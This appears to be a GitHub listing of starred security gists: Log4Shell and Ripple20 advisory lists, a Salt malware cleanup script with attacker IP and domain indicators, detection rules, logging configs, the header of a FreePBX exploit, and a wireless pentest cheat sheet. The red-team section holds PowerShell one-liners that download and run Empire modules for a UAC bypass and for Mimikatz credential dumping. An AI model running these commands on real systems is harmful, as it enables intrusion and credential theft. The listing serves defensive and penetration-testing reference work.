
Murat Y. muratyokus

@SwitHak
SwitHak / 20211210-TLP-WHITE_LOG4J.md
Last active October 14, 2025 08:35
BlueTeam CheatSheet * Log4Shell* | Last updated: 2021-12-20 2238 UTC

Security advisories, bulletins and vendor responses linked to Log4Shell (CVE-2021-44228)

Errors, typos, something to say?

  • If you want to add a link, comment or send it to me
  • Feel free to report any mistake directly below in the comments or in a DM on Twitter @SwitHak

Other great resources

  • Royce Williams' list, sorted by vendor response: Royce List
  • Very detailed list: NCSC-NL
  • The list maintained by the U.S. Cybersecurity and Infrastructure Security Agency: CISA List
@SwitHak
SwitHak / 20200618-TLP-WHITE_Ripple20.md
Last active June 9, 2025 15:41
BlueTeam CheatSheet * Ripple20 * | Last updated: 2020-06-26 2121 UTC

Ripple20, a set of vulnerabilities inside the Treck / KASAGO IP stacks

General

  • Ripple20 is the codename for a set of 19 vulnerabilities discovered by the cybersecurity team JSOF.
  • These vulnerabilities are inside an IP stack sold under two different names (Treck TCP/IP for the U.S. market, Kasago TCP/IP for the Asian market). These two stacks were bought and used under private label by several software companies; some known names are: GHnetv2, Kwiknet, Quadnet.
  • But there's more: these stacks were also integrated, sometimes with modifications, inside several RTOS (real-time operating systems).
  • Last, some of the vulnerabilities, depending on the device operating system, configuration or location, can have a greater or lower CVSS score.
  • My advice is for companies to ask their suppliers if they use one of these stacks and assess the risk following their company risk policy.
  • This will not be an easy set of vulnerabilities to patch, sadly.
@itskenny0
itskenny0 / cleanup.sh
Last active November 5, 2020 10:46
Cleanup script for salt minions affected by recent CVE exploitation - https://saltexploit.com - https://github.com/saltstack/salt/issues/57057
#!/bin/bash
## Executing this script is not a guarantee for a secure host!
## This script is a collection of the junk I have found on my hosts and what
## the SaltStack community gave as input. We have seen this attack evolve.
## Please have a very close look at your systems and consider reinstalling them
## to be absolutely sure you are free of malware.
# remove crontab persistence
for i in 54.36.185.99 217.8.117.137 176.31.60.91 217.12.210.192 54.36.185.99 54.36.185.99 89.223.121.139 torsocks anagima3 sa.sh$ c.sh$ selcdn.ru salt-store; do
1- T1174 - Password Filter - Catch malicious password filters in the event log
index=wineventlog EventID=4614
AND NOT NotificationPackageName IN ("scecli", "RASSFM", "WDIGEST", "KDCSVC", "KDCPW")
Reference
https://twitter.com/xknow_infosec/status/1178747476976820228
2- T1113 - Screen Capture
Look for nircmd executions
PowerShell execution with "screenshot" in the arguments
3- T1074 - Data Staged
Enable object auditing on files and folders - EventID 4663 - look for copying of many different files in a short time span. Use bro
# Description:
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
# Import Mimikatz Module to run further commands
@thel3l
thel3l / 18650-fixed.py
Created June 2, 2018 11:31
FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution - Fixed to avoid SSL errors.
#!/usr/bin/python
############################################################
# Exploit Title: FreePBX / Elastix pre-authenticated remote code execution exploit
# Google Dork: oy vey
# Date: March 23rd, 2012
# Author: muts
# Version: FreePBX 2.10.0/ 2.9.0, Elastix 2.2.0, possibly others.
# Tested on: multiple
# CVE : notyet
# Blog post : http://www.offensive-security.com/vulndev/freepbx-exploit-phone-home/
@Neo23x0
Neo23x0 / audit.rules
Last active October 23, 2025 06:15
Linux Auditd Best Practice Configuration
# IMPORTANT!
# This gist has been transformed into a github repo
# You can find the most recent version there:
# https://github.com/Neo23x0/auditd
@dogrocker
dogrocker / Wireless Penetration Testing Cheat Sheet.md
Created July 2, 2016 18:30
Wireless Penetration Testing Cheat Sheet

# Wireless Penetration Testing Cheat Sheet

## WIRELESS ANTENNA

  • Enable monitor mode
root@uceka:~# ifconfig wlan0mon down
root@uceka:~# iwconfig wlan0mon mode monitor
root@uceka:~# ifconfig wlan0mon up
@leommoore
leommoore / mongodb_3.2.x_logging.md
Last active July 4, 2021 10:51
MongoDB 3.2.x Logging

MongoDB 3.2.x Logging

The main log file is mongod.log. You can specify the log file location when you start the mongod process, but if you have installed on Ubuntu from a package then your log file will normally be located at /var/log/mongodb/mongod.log.

You can tail the log file using:

tail -f /var/log/mongodb/mongod.log

From the Mongo shell you can also view the log file using:

show logs

@Neo23x0
Neo23x0 / config-server.xml
Last active March 11, 2024 14:34
Sysmon Base Configuration - Windows Server
<!--
This is a Microsoft Sysmon configuration to be used on Windows server systems
v0.2.1 December 2016
Florian Roth
The focus of this configuration is
- hacking activity on servers / lateral movement (bad admin, attacker)
It is not focussed on
- malware detection (execution)
- malware detection (network connections)